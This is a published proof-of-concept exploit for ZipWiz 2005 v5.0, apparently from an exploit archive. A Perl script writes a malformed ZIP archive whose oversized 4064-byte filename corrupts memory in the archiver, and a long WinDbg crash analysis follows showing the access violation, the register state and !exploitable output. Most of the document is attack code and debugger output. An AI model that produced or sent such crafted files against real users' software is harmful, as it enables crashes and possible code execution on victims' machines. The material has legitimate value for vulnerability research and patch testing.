ZipWiz 2005 5.0 ZIP File Buffer Corruption

`#!/usr/bin/perl  
#  
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit  
#[+]Date: 08\07\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html  
#[+]Version: v5.0  
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese  
#[+]CVE: N/A  
#  
#  
  
use strict;  
use warnings;  
  
my $filename = "Exploit.zip";  
  
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";  
print "\t\tCreated by C4SS!0 G0M3S\n";  
print "\t\tE-mail Louredo_\@hotmail.com\n";  
print "\t\tSite www.exploit-br.org/\n\n";  
sleep(1);  
  
my $head = "\x50\x4B\x03\x04\x14\x00\x00".  
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00" .  
"\xe4\x0f" .  
"\x00\x00\x00";  
  
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".  
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\xe4\x0f".  
"\x00\x00\x00\x00\x00\x00\x01\x00".  
"\x24\x00\x00\x00\x00\x00\x00\x00";  
  
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".  
"\x00\x01\x00\x01\x00".  
"\x12\x10\x00\x00".  
"\x02\x10\x00\x00".  
"\x00\x00";  
  
my $payload = "A" x 4064;  
  
$payload = $payload.".txt";  
my $zip = $head.$payload.$head2.$payload.$head3;  
open(FILE,">$filename") || die "[-]Error:\n$!\n";  
print FILE $zip;  
close(FILE);  
print "[+] ZIP File Created With Sucess:)\n";  
sleep(3);  
  
=head1  
  
(314.e4): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=41414141 ebx=00bd7e50 ecx=55555551 edx=000eaac8 esi=00bd5290 edi=0050a1e4  
eip=0045de1a esp=0006eaac ebp=0006eab8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202  
image00400000+0x5de1a:  
0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=????????  
0:000> .exr -1  
ExceptionAddress: 0045de1a (image00400000+0x0005de1a)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: aab955ac  
Attempt to read from address aab955ac  
0:000> dd edx  
000eaac8 ffffffff ffffffff 00140014 00000000  
000eaad8 34ceacb7 00000000 00000000 00000000  
000eaae8 00000fe4 00000000 00240001 00000000  
000eaaf8 00010000 00000000 0fe60000 01040000  
000eab08 00000000 ffffffff ffffffff 00000000  
000eab18 00000000 ffffffff ffffffff 00000006  
000eab28 ba000000 baadf00d baadf00d baadf00d  
000eab38 baadf00d ba00000d baadf00d 00adf00d  
0:000> r  
eax=41414141 ebx=00bd7e50 ecx=55555551 edx=000eaac8 esi=00bd5290 edi=0050a1e4  
eip=0045de1a esp=0006eaac ebp=0006eab8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202  
image00400000+0x5de1a:  
0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=????????  
0:000> !load winext/msec.dll  
0:000> !exploitable -v  
HostMachine\HostUser  
Executing Processor Architecture is x86  
Debuggee is in User Mode  
Debuggee is a live user mode debugging session on the local machine  
Event Type: Exception  
Exception Faulting Address: 0xffffffffaab955ac  
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)  
Exception Sub-Type: Read Access Violation  
  
Faulting Instruction:0045de1a mov eax,dword ptr [edx+ecx*8+5ch]  
  
Basic Block:  
0045de1a mov eax,dword ptr [edx+ecx*8+5ch]  
Tainted Input Operands: ecx, edx  
0045de1e cmp eax,8  
Tainted Input Operands: eax  
0045de21 ja image00400000+0x5de4d (0045de4d)  
Tainted Input Operands: ZeroFlag, CarryFlag  
  
Exception Hash (Major/Minor): 0x00020e6f.0x3f7f6d68  
  
Stack Trace:  
image00400000+0x5de1a  
image00400000+0x1e773  
image00400000+0x1ef50  
image00400000+0x1f024  
image00400000+0xc0312  
image00400000+0xbffef  
image00400000+0xbee0f  
image00400000+0xbf0c4  
USER32!InternalCallWinProc+0x28  
USER32!UserCallWinProcCheckWow+0x150  
USER32!DispatchClientMessage+0xa3  
USER32!__fnDWORD+0x24  
ntdll!KiUserCallbackDispatcher+0x13  
USER32!NtUserCallHwndLock+0xc  
image00400000+0x165a  
image00400000+0x538c5  
image00400000+0x69b35  
image00400000+0x6861a  
image00400000+0x24947  
image00400000+0xc041e  
image00400000+0xbffef  
image00400000+0xbee0f  
image00400000+0xbf0c4  
USER32!InternalCallWinProc+0x28  
USER32!UserCallWinProcCheckWow+0x150  
USER32!DispatchMessageWorker+0x306  
USER32!DispatchMessageA+0xf  
image00400000+0xc373c  
image00400000+0xc31d8  
image00400000+0xc49f3  
Instruction Address: 0x000000000045de1a  
  
Description: Data from Faulting Address controls Branch Selection  
Short Description: TaintedDataControlsBranchSelection  
Exploitability Classification: UNKNOWN  
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at image00400000+0x000000000005de1a (Hash=0x00020e6f.0x3f7f6d68)  
  
The data from the faulting address is later used to determine whether or not a branch is taken.  
0:000> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
GetPageUrlData failed, server returned HTTP status 404  
URL requested: http://watson.microsoft.com/StageOne/image00400000/4_0_0_0/image00400000/4_0_0_0/0005de1a.htm?Retriage=1  
  
FAULTING_IP:  
image00400000+5de1a  
0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch]  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 0045de1a (image00400000+0x0005de1a)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: aab955ac  
Attempt to read from address aab955ac  
  
FAULTING_THREAD: 000000e4  
  
PROCESS_NAME: image00400000  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - A instru o no "0x%08lx" fez refer ncia mem ria no "0x%08lx". A mem ria n o p de ser "%s".  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - A instru o no "0x%08lx" fez refer ncia mem ria no "0x%08lx". A mem ria n o p de ser "%s".  
  
EXCEPTION_PARAMETER1: 00000000  
  
EXCEPTION_PARAMETER2: aab955ac  
  
READ_ADDRESS: aab955ac  
  
FOLLOWUP_IP:  
image00400000+5de1a  
0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch]  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 70  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
LAST_CONTROL_TRANSFER: from 0041e773 to 0045de1a  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
0006eab8 0041e773 00570d20 00bd7e50 00bd541c image00400000+0x5de1a  
0006eb18 0041ef50 00bd5290 00bd5290 0041efa0 image00400000+0x1e773  
0006eb44 0041f024 003ef170 00000000 0050a1e4 image00400000+0x1ef50  
0006ebd4 004c0312 00bd5290 00bd5290 000a7320 image00400000+0x1f024  
0006ec48 004bffef 0000000f 00000000 004f3de0 image00400000+0xc0312  
0006ec68 004bee0f 0000000f 00000000 00000000 image00400000+0xbffef  
0006ecc8 004bf0c4 00bd5290 000601b6 0000000f image00400000+0xbee0f  
0006ece4 7e368734 000601b6 0000000f 00000000 image00400000+0xbf0c4  
0006ed10 7e368816 004bf099 000601b6 0000000f USER32!InternalCallWinProc+0x28  
0006ed78 7e378ea0 00000000 004bf099 000601b6 USER32!UserCallWinProcCheckWow+0x150  
0006edcc 7e378eec 00784cd0 0000000f 00000000 USER32!DispatchClientMessage+0xa3  
0006edf4 7c90e473 0006ee04 00000018 00784cd0 USER32!__fnDWORD+0x24  
0006ee18 7e37aef1 7e37aedc 0006019e 0000005e ntdll!KiUserCallbackDispatcher+0x13  
0006ee2c 0040165a 0006019e 004534b6 00000074 USER32!NtUserCallHwndLock+0xc  
0006ee48 004538c5 00000001 0058c770 00000000 image00400000+0x165a  
0006ee9c 00469b35 0052ca80 00000000 0058c770 image00400000+0x538c5  
0006eec8 0046861a 00bd489c 00000000 0052ca80 image00400000+0x69b35  
0006eeec 00424947 00bd489c 0052c404 00bd1530 image00400000+0x6861a  
0006fcc8 004c041e 00bd4740 00000000 00bd1530 image00400000+0x24947  
0006fd44 004bffef 00000425 00bd4740 004f5170 image00400000+0xc041e  
0006fd64 004bee0f 00000425 00bd4740 00000000 image00400000+0xbffef  
0006fdc4 004bf0c4 00bd1530 002201dc 00000425 image00400000+0xbee0f  
0006fde0 7e368734 002201dc 00000425 00bd4740 image00400000+0xbf0c4  
0006fe0c 7e368816 004bf099 002201dc 00000425 USER32!InternalCallWinProc+0x28  
0006fe74 7e3689cd 00000000 004bf099 002201dc USER32!UserCallWinProcCheckWow+0x150  
0006fed4 7e3696c7 0058c7a0 00000001 0058c7a0 USER32!DispatchMessageWorker+0x306  
0006fee4 004c373c 0058c7a0 00000001 0058c770 USER32!DispatchMessageA+0xf  
0006fef4 004c31d8 ffffffff 0058c770 0006ffc0 image00400000+0xc373c  
0006ff0c 004c49f3 0058c770 004c55d5 010ef6ee image00400000+0xc31d8  
00000000 00000000 00000000 00000000 00000000 image00400000+0xc49f3  
  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: image00400000+5de1a  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: image00400000  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 4399fa20  
  
STACK_COMMAND: ~0s ; kb  
  
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_image00400000+5de1a  
  
IMAGE_NAME: C:\Program files\ZipWiz\ZWP32.EXE  
  
FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_C:_Program_files_ZipWiz_ZWP32.EXE!Unknown  
  
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/image00400000/4_0_0_0/4399fa20/image00400000/4_0_0_0/4399fa20/c0000005/0005de1a.htm?Retriage=1  
  
Followup: MachineOwner  
---------  
  
0:000> lmvm image00400000  
start end module name  
00400000 0063f000 image00400000 C (no symbols)   
Loaded symbol image file: C:\Program files\ZipWiz\ZWP32.EXE  
Image path: image00400000  
Image name: image00400000  
Timestamp: Fri Dec 09 19:41:52 2005 (4399FA20)  
CheckSum: 00000000  
ImageSize: 0023F000  
File version: 4.0.0.0  
Product version: 4.0.0.0  
File flags: 0 (Mask 3F)  
File OS: 40004 NT Win32  
File type: 1.0 App  
File date: 00000000.00000000  
Translations: 0409.04b0  
CompanyName: Synaptek Software  
ProductName: Zip Wizard Pro(tm)  
InternalName: zwp32  
OriginalFilename: zwp32.exe  
ProductVersion: 4, 0, 0, 0  
FileVersion: 4, 0, 0, 0  
FileDescription: ZipWiz application file  
LegalCopyright: Copyright © 1994-2005 Synaptek Software  
LegalTrademarks: Synaptek, IntelliZip,ZipWiz Explorer,ZipWiz Navigator, ZipWiz, Zip Wizard Pro, Zip Pro are trademarks of Synaptek Software.  
0:000> .exr 0xffffffffffffffff  
ExceptionAddress: 0045de1a (image00400000+0x0005de1a)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: aab955ac  
Attempt to read from address aab955ac  
0:000> g  
(314.e4): Access violation - code c0000005 (!!! second chance !!!)  
eax=41414141 ebx=00bd7e50 ecx=55555551 edx=000eaac8 esi=00bd5290 edi=0050a1e4  
eip=0045de1a esp=0006eaac ebp=0006eab8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202  
image00400000+0x5de1a:  
0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=????????  
  
=cut  
  
`